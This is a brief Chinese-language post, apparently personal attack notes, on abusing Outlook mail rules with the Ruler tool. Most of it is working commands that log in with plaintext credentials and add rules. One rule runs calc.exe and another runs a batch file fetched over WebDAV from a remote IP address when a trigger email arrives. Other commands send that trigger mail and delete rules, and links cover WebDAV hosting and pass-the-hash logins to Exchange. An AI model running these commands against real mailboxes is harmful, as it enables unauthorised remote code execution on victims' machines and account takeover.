关于outlook邮件客户端规则滥用记录

利用工具:
https://github.com/sensepost/ruler

工具命令相关记录:

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 display

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 add --location "calc.exe" --trigger "systest" -name test
ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 add --location "\\\\173.248.241.176\\webdav\\run.bat" --trigger "linux" -name linux

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345  send --subject "hello linux" --body "ssssss"

ruler-win64.exe -k --email [email protected] --username micle --password Admin12345 delete --id 0100000005a104b6

ruler-win64.exe -k --email [email protected] --username test --password "123456aA!" display

相关文章:
https://paper.seebug.org/775/

Malicious Outlook Rules


wbdav搭建https://www.digitalocean.com/community/tutorials/how-to-configure-webdav-access-with-apache-on-ubuntu-12-04

只有NTLM HASH的情况下如何登录exchange操作:
https://github.com/pentest-tools-public/Pass-to-hash-EWS

Leave a Reply